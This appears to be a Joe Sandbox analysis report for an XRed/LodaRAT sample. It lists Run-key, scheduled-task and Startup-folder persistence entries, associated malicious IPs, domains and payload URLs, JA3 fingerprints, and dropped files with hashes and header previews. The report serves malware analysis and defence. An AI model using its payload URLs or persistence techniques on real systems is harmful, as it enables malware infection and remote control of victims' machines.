Excluded IPs from analysis (whitelisted): 216.58.206.67, 108.177.15.84, 142.250.181.238, 172.217.18.14, 142.250.185.142, 216.58.206.78, 184.28.90.27, 199.232.214.172, 172.217.16.206, 142.250.186.46, 52.109.76.240, 52.113.194.132, 20.189.173.28, 20.189.173.22, 13.107.246.45, 172.202.163.200, 173.222.162.55, 40.126.32.74
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, clients2.google.com, redirector.gvt1.com, onedscolprdwus18.westus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, clients.l.google.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
Execution Graph export aborted for target powershell.exe, PID 7320 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:36:28	API Interceptor	128x Sleep call for process: powershell.exe modified
05:36:35	API Interceptor	2x Sleep call for process: svchost.exe modified
05:37:17	API Interceptor	74x Sleep call for process: Synaptics.exe modified
05:37:41	API Interceptor	1x Sleep call for process: WerFault.exe modified
11:37:12	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run TGWEKK "C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe"
11:37:13	Task Scheduler	Run new task: TGWEKK.exe path: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe
11:37:20	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
11:37:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run TGWEKK "C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe"
11:37:38	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGWEKK.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.144.225	NEW-DRAWING-SHEET.bat	Get hash	malicious	Unknown	Browse
172.111.138.100	Purchase-Order.exe	Get hash	malicious	LodaRAT, XRed	Browse
	test.msi	Get hash	malicious	LodaRAT	Browse
	FGNEBI.exe	Get hash	malicious	LodaRAT, XRed	Browse
	sdlvrr.msi	Get hash	malicious	LodaRAT	Browse
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse
	Machine-PO.exe	Get hash	malicious	XRed	Browse
	AYRASY.exe	Get hash	malicious	LodaRAT, XRed	Browse
	222.exe	Get hash	malicious	LodaRAT, XRed	Browse
185.199.111.133	cr_asm2.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_crypter.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_hiddenz.ps1	Get hash	malicious	AsyncRAT, XWorm	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	BeginSync lnk.lnk	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
69.42.215.252	Purchase-Order.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	FGNEBI.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	docx.msi	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	hoaiuy.msi	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	222.msi	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	Machine-PO.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	AYRASY.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
raw.githubusercontent.com	NEW-DRAWING-SHEET.bat	Get hash	malicious	Unknown	Browse	185.199.111.133
	fxsound_setup.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	185.199.108.133
	8lOT1rXZp5.exe	Get hash	malicious	RedLine	Browse	185.199.111.133
	Purchase Order No. G02873362-Docx.vbs	Get hash	malicious	LodaRAT, XRed	Browse	185.199.108.133
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.199.110.133
	Navan - Itinerary.pdf.scr.exe	Get hash	malicious	LummaC	Browse	185.199.110.133
	BigProject.exe	Get hash	malicious	LummaC	Browse	185.199.110.133
paste.fo	NEW-DRAWING-SHEET.bat	Get hash	malicious	Unknown	Browse	172.67.144.225
	Bank Information Details.bat	Get hash	malicious	LodaRAT, XRed	Browse	104.21.28.76
	SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Get hash	malicious	XWorm	Browse	104.21.28.76
	confirmationcr.vbs	Get hash	malicious	Redline Clipper	Browse	104.21.70.240
	9K25QyJ4hA.exe	Get hash	malicious	Unknown	Browse	104.21.70.240
	9K25QyJ4hA.exe	Get hash	malicious	Unknown	Browse	104.21.70.240
freedns.afraid.org	Purchase-Order.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	FGNEBI.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	docx.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	hoaiuy.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	222.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	Machine-PO.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	AYRASY.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	NEW-DRAWING-SHEET.bat	Get hash	malicious	Unknown	Browse	185.199.111.133
	https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.com	Get hash	malicious	Unknown	Browse	151.101.2.137
	star.ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	167.83.165.108
	EFT Payment_Transcript__Survitecgroup.html	Get hash	malicious	Unknown	Browse	151.101.2.137
	installeasyassist.exe	Get hash	malicious	Unknown	Browse	151.101.65.21
	https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.html	Get hash	malicious	Unknown	Browse	151.101.129.44
	http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	fxsound_setup.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	Hwacaj.exe	Get hash	malicious	Darkbot	Browse	151.101.66.137
	rpDOUhuBC5.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
VOXILITYGB	Purchase-Order.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	test.msi	Get hash	malicious	LodaRAT	Browse	172.111.138.100
	FGNEBI.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	sdlvrr.msi	Get hash	malicious	LodaRAT	Browse	172.111.138.100
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	Machine-PO.exe	Get hash	malicious	XRed	Browse	172.111.138.100
	AYRASY.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	222.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
CLOUDFLARENETUS	NEW-DRAWING-SHEET.bat	Get hash	malicious	Unknown	Browse	172.67.144.225
	Jx6bD8nM4qW9sL3v.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
	Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse	188.114.97.3
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	6QLvb9i.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	http://i646972656374o6c6373o636f6dz.oszar.com/	Get hash	malicious	Unknown	Browse	104.16.79.73
	securedoc_20241220T111852.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://visa-pwr.com/	Get hash	malicious	Unknown	Browse	104.18.28.104
AWKNET-LLCUS	Purchase-Order.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	FGNEBI.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	docx.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	hoaiuy.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	222.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	Machine-PO.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	AYRASY.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	NEW-DRAWING-SHEET.bat	Get hash	malicious	Unknown	Browse	172.67.144.225
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.144.225
	lumma.ps1	Get hash	malicious	LummaC	Browse	172.67.144.225
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	172.67.144.225
	Winter.mp4.hta	Get hash	malicious	LummaC	Browse	172.67.144.225
	aYu936prD4.exe	Get hash	malicious	Unknown	Browse	172.67.144.225
	aYu936prD4.exe	Get hash	malicious	Unknown	Browse	172.67.144.225
	VegaStealer_v2.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	172.67.144.225
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse	172.67.144.225
37f463bf4616ecd445d4a1937da06e19	Purchase-Order.exe	Get hash	malicious	LodaRAT, XRed	Browse	142.250.185.193 216.58.206.46
	FGNEBI.exe	Get hash	malicious	LodaRAT, XRed	Browse	142.250.185.193 216.58.206.46
	docx.msi	Get hash	malicious	XRed	Browse	142.250.185.193 216.58.206.46
	hoaiuy.msi	Get hash	malicious	XRed	Browse	142.250.185.193 216.58.206.46
	222.msi	Get hash	malicious	XRed	Browse	142.250.185.193 216.58.206.46
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	142.250.185.193 216.58.206.46
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	142.250.185.193 216.58.206.46
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	142.250.185.193 216.58.206.46
	Machine-PO.exe	Get hash	malicious	XRed	Browse	142.250.185.193 216.58.206.46
	AYRASY.exe	Get hash	malicious	LodaRAT, XRed	Browse	142.250.185.193 216.58.206.46

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\Synaptics\Synaptics.exe	docx.msi	Get hash	malicious	XRed	Browse
C:\ProgramData\Synaptics\RCX1FC6.tmp	docx.msi	Get hash	malicious	XRed	Browse
C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	docx.msi	Get hash	malicious	XRed	Browse

Created / dropped Files

C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	118
Entropy (8bit):	3.5700810731231707
Encrypted:	false
SSDEEP:	3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5:	573220372DA4ED487441611079B623CD
SHA1:	8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256:	BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512:	F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8807595198842556
Encrypted:	false
SSDEEP:	1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9n:0J7adfWuK0p/QDfKoPeuP0aN4fqoxs
MD5:	B9D3B364D06332F00F5345D7834AB9EF
SHA1:	C717BC837410826538A57A1504D90E109EA42F15
SHA-256:	56C6DF9E6166C3CDC1CED67547A59383DFA64BD8BFFE86E6F9947A2538FF3616
SHA-512:	FCBC2EEDF17334BE879C5F766B94878A2AEA05AE4BFB1158FEFF7C224E3977635E58020A3C89758256F5463CF29C14701DEBA94863487DF6840C2D0883475D10
Malicious:	false
Preview:	2.e.........@..@12...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................K<...kS..#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xf33b0495, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7880847699904983
Encrypted:	false
SSDEEP:	1536:vSB2ESB2SSjlK/lv4T9DY1k0aXjJ8VQVYkr3g16iq2UPkLk+kYv/gKr51KrgzAkv:vazaPv4V4fXq2UaB
MD5:	1FA20A9261703778328C54E677B3E5AA
SHA1:	E2931E0C26B3A02C074AB5722AC39D512D6315E1
SHA-256:	6184F88E783864E33413310561FC1D24162FD3ED575FB4494EBE50E3B5A2516C
SHA-512:	FE287381B8B2DD7C2B91D780704C0398D8F7BB7C199F4E629F1D4948F330AD0977E5FF7877B3C9BA63D3C889DC046987F7589FC137175514E8B96FF7DD3D4E61
Malicious:	false
Preview:	.;..... ...............X\...;...{......................X............{..#$...\|..h...........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......12...{...............................................................................................................................................................................................2...{....................................v}#$...\|.:....................#$...\|...........................#......h.......................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08081369788610498
Encrypted:	false
SSDEEP:	3:bdl/lEYexZtYv1XlVG0+q2Iqe8lkj0illNTt/4ll/Q6beV/:BtlEzxZ4GE8lMRHtc6V
MD5:	638CF19F513CDA7694ADE0808742150E
SHA1:	7060072D0932E4FA03B793179D75523E2F7506E7
SHA-256:	4DF1DFA1028269F8A5F50CE86257CBDC6219D887A42E362499CB1CA30A4E3091
SHA-512:	5383E4852270A0DECBE4B1D740C4B09D30F2D03880AF23C96901429E6150BD9EE5EE5F48D0B3487C16B6AC8B330153CE7D7C5AEEC67BA1B73939F014105BD12E
Malicious:	false
Preview:	...m.....................................;...{..#$...\|.......{...............{.......{....:......{.....................#$...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_e73781c637c020daee3de6ae263d2d0a91f2a4c_455b7b6e_efe97e45-91f3-4457-ab4b-54f0be721b13\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.134143049379425
Encrypted:	false
SSDEEP:	192:y+XPDVpsBI40vvNekLDzJDzqjLeA/NccBFzuiFmZ24IO8EKDzy:jyBWvvNekLJqjsizuiFmY4IO8zy
MD5:	CCF0126103EAE58380496FE295468CC5
SHA1:	775028870AC16B50FC8344EF7035F029FE73BC94
SHA-256:	AC31259F38086A06C448A6AAE5B2A1ED298FDAE74443CC97E3647C744E71B53D
SHA-512:	35BC3A3156FF4DBD317D188EF732ED3F389EA4CF65B348757D8E65AE9E70BE845E449D0405E74F3D9EEA239120893850E5EDA8993B31BEF28A064105E9190A71
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.8.6.4.6.4.6.0.2.3.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.8.6.5.0.3.1.9.5.9.4.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.e.9.7.e.4.5.-.9.1.f.3.-.4.4.5.7.-.a.b.4.b.-.5.4.f.0.b.e.7.2.1.b.1.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.b.9.5.0.6.c.4.-.8.1.5.b.-.4.3.3.5.-.b.f.2.6.-.b.b.5.6.2.b.c.b.1.3.5.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.9.0.-.0.0.0.1.-.0.0.1.3.-.4.3.0.4.-.5.0.c.7.a.6.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.c.5.2.4.5.6.0.5.e.8.c.a.8.8.8.e.3.6.8.1.0.a.8.1.7.d.c.9.7.7.6.9.6.2.0.7.b.9.0.b.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6480.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Dec 30 10:37:27 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	1777122
Entropy (8bit):	1.719115317082333
Encrypted:	false
SSDEEP:	3072:JIRdGaUKejmDGZB5OFd8sX28/TI3kE+9wio+YxJmW1d:JIRdGaUKe88sXBTI3kTwiDmmEd
MD5:	B74DC03FA3F1373C837426E98B154419
SHA1:	4B2146C2E727B29579D037F394C4BC7D20D4BE50
SHA-256:	1F665498892187AFEEA3EFFA05CCDD3D11A993F2D4F73F5304CBA4452DB6D64C
SHA-512:	719F2AC5AFFD0E99A6BAD7C2D565DE11687A3658551B3F8A14949169ED1685DE130594E70A5E32227DCB87C05C1005B72B91768609C4FD133730995E02E3D947
Malicious:	false
Preview:	MDMP..a..... ........wrg.....................................'..B,..........T.......8...........T...............B...........D6..........08..............................................................................eJ.......8......GenuineIntel............T............wrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER71CF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6306
Entropy (8bit):	3.7183702929313194
Encrypted:	false
SSDEEP:	192:R6l7wVeJQxG6ROYirJkJPVpDG89bw/sfJQm:R6lXJl6YYGJkJPPwkf7
MD5:	C6F10D53724C70557537B6ADD771D6F1
SHA1:	348670ED67C1FDC7AFA1860C45A1A5A49072C446
SHA-256:	67D7DE52FCAD7C43BF88232E5717EA54B506F8AAE70A784F97469A8494948608
SHA-512:	51843E68090D2E4197AC648FC375B992C8D6F166403B2A57844E8A5A398569FEA46D9D353E8CD954B049866F1C4CAF03B1E6030E3E3BFE42BBB576874018CC80
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.6.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER71FF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4580
Entropy (8bit):	4.444870679029135
Encrypted:	false
SSDEEP:	48:cvIwWl8zseJg77aI9tqWpW8VYy4Ym8M4JFFFc+q8ZU54yrZOd:uIjfUI7PL7V71JORqoZOd
MD5:	98946EE1BAC06E8ED686E0F7F0A1DD8C
SHA1:	46F27F4CD1807DEA3CBF3132CC2F76594E4D797C
SHA-256:	E7A2FD639ED72813F5701F4E587751CFC0004E50428D43D02D45F97DAB5E3C2B
SHA-512:	14AC0D8D94EAA44A3506192FF57C1FD4BC7D7483BED8345E6C7FA684FA8F27576EA790AD13E9DE321B91B95ACFCC10F8CBDB94F0EAEC57FFE68906748C599073
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653860" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Synaptics\RCX1FC6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	771584
Entropy (8bit):	6.638498239119241
Encrypted:	false
SSDEEP:	12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Imr:ansJ39LyjbJkQFMhmC+6GD9h
MD5:	4BC81D74086B89C85F1D208F781675F3
SHA1:	C5245605E8CA888E36810A817DC977696207B90B
SHA-256:	F85A3EAA91C625FDA14FE0C55BED7C3F43321475D871AA07AF90A2E532219B85
SHA-512:	3FD588E5A49CCA2C63784AE363FF5FAE6574D83F08D877F1089768E000F0A7DAFD51B7B28C2A543426073F2D9A96FC1E1E25796C713A5141E97C7E283901A750
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX1FC6.tmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX1FC6.tmp, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: docx.msi, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................&....................@.......................... ...................@..............................B...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\ProgramData\Synaptics\Synaptics.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1710592
